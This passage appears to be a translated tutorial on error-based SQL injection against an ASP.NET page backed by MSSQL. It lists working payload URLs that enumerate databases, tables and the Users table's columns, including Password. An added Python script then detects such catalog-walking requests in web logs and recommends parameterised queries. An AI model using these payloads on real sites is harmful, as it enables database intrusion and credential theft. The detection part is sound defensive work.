http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=134)+--+

The database with dbid 134 is named databaseB, which shows how many databases this server holds.

0x04 Querying the table names of database databaseA

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U')--

The first table name returned is wenzhang.

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang'))--

The second table name returned is TF_CASE_Options. Keep querying in the same way, excluding each name found so far:

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options'))--

…

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options','tempTable1','Buy_Note','MF_CASE','td','Buy_List','ExamQuestion','Set_Price','Buy_Note_LinShi'))--

At this point the query returns the Users table.

0x05 Querying the column names of the Users table

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from databaseA.dbo.sysobjects where xtype='U' and name='Users' and uid>(str(id)))+--+

This leaks the object id of the Users table: 174623665.

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665)+--+

This returns the UserId column. Keep querying in the same way, excluding each column name found so far:

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName'))+--+

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName'))+--+

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password' ))+--+

…

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password','IsForbidden','DepartmentId','employee_id','sfzh','sex','brithday','post','speciality','school','email','tel','ceping_name','inout','roleid','note_1','note_2','note_3','note_4','note_5','note_6','note_7','note_8','note_9'))+--+
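From the defender's side, the table walk in 0x04 and the column walk in 0x05 leave a very recognisable trail in the web server log: one client, one parameter, a subselect against sysobjects or syscolumns, and a NOT IN list that grows by exactly one name per request. The script below is an added example, not part of the original post or of any product, that scans constructed log lines (simplified W3C fields: date, time, client IP, method, uri-stem, uri-query, status; the IPs and the log format are assumptions) and reports both the individual catalog-enumeration requests and the clients that repeat them. The root fix for the page itself is a parameterised query in the test.aspx handler so that the id value can never be concatenated into SQL; the detection here is the compensating control for the logs you already have.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (not from any real server). The query strings are
# percent-encoded the way a web server records them and mirror the shape of the
# catalog-walking payloads shown in this post.
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /test.aspx id=8 200
2024-01-01 10:00:02 203.0.113.5 GET /test.aspx id=8%27and+0%3C%3E(select+top+1+name+from+databaseA.dbo.sysobjects+where+xtype=%27U%27)-- 500
2024-01-01 10:00:03 203.0.113.5 GET /test.aspx id=8%27and+0%3C%3E(select+top+1+name+from+databaseA.dbo.sysobjects+where+xtype=%27U%27+and+name+not+in(%27wenzhang%27))-- 500
2024-01-01 10:00:04 203.0.113.5 GET /test.aspx id=8%27and+0%3C%3E(select+top+1+name+from+databaseA.dbo.sysobjects+where+xtype=%27U%27+and+name+not+in(%27wenzhang%27,%27TF_CASE_Options%27))-- 500
2024-01-01 10:00:05 203.0.113.5 GET /test.aspx id=8%27and+0%3C%3E(select+top+1+name+from+databaseA.dbo.syscolumns+where+id=174623665)+--+ 500
2024-01-01 10:00:06 198.51.100.9 GET /test.aspx id=42 200
2024-01-01 10:00:07 198.51.100.9 GET /search.aspx q=sysobjects+reference 200
"""

# MSSQL catalog views that a web parameter has no legitimate reason to name.
CATALOG_VIEW = re.compile(r"\b(sysobjects|syscolumns|sysdatabases|information_schema\.\w+)\b", re.I)
# An embedded SELECT ... FROM is the core of every payload in the post.
SUBSELECT = re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S)
# A quote directly followed by a boolean operator: the input broke out of a string literal.
QUOTE_BREAK = re.compile(r"'\s*(and|or)\b", re.I)
# A trailing comment that swallows the rest of the original query (the '--' / '+--+' tails).
TRAILING_COMMENT = re.compile(r"(--|/\*)\s*$")
# Names already excluded with NOT IN (...); the list grows by one per request.
NOT_IN_LIST = re.compile(r"\bnot\s+in\s*\(([^)]*)\)", re.I)


def parse_line(line):
    """Split one simplified W3C log line into its fields and URL-decode the query."""
    parts = line.split(" ", 6)  # date time ip method stem query status
    if len(parts) != 7:
        return None
    date, time, ip, method, stem, query, status = parts
    return {"time": f"{date} {time}", "ip": ip, "method": method, "stem": stem,
            "query": unquote_plus(query), "status": status}


def analyze_request(decoded_query):
    """Return the list of injection indicators matched by one decoded query string."""
    q = decoded_query.strip()
    indicators = []
    if QUOTE_BREAK.search(q):
        indicators.append("quote-break")
    if SUBSELECT.search(q):
        indicators.append("subselect")
    m = CATALOG_VIEW.search(q)
    if m:
        indicators.append("catalog:" + m.group(1).lower())
    if TRAILING_COMMENT.search(q):
        indicators.append("trailing-comment")
    return indicators


def excluded_names(decoded_query):
    """Names the client has already discovered, taken from its NOT IN (...) list."""
    m = NOT_IN_LIST.search(decoded_query)
    if not m:
        return []
    return [n.strip().strip("'\"") for n in m.group(1).split(",") if n.strip()]


def is_catalog_walk(indicators):
    """Flag only when an embedded SELECT names a catalog view; the word
    'sysobjects' on its own in a search box is not enough."""
    return "subselect" in indicators and any(i.startswith("catalog:") for i in indicators)


def scan_log(text):
    """Return one finding per request that looks like schema enumeration."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ind = analyze_request(rec["query"])
        if is_catalog_walk(ind):
            findings.append({"time": rec["time"], "ip": rec["ip"], "stem": rec["stem"],
                             "indicators": ind, "excluded": excluded_names(rec["query"])})
    return findings


def walk_sessions(findings, min_requests=3):
    """Group findings per client; a client repeating the pattern is walking the
    catalog one object name at a time, as the growing NOT IN list shows."""
    by_ip = defaultdict(list)
    for f in findings:
        by_ip[f["ip"]].append(f)
    return {ip: fs for ip, fs in by_ip.items() if len(fs) >= min_requests}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["ip"], h["stem"], h["indicators"], "already seen:", h["excluded"])
    for ip, fs in walk_sessions(hits).items():
        print(f"{ip}: {len(fs)} catalog-enumeration requests, last excluded list {fs[-1]['excluded']}")
```

The per-client grouping is what separates a single scanner probe from the walk shown in 0x04 and 0x05: a real enumeration produces a run of flagged requests whose excluded list lengthens by one each time, and that progression (together with the 500 responses the broken query causes) is worth alerting on even when any single request would be ambiguous.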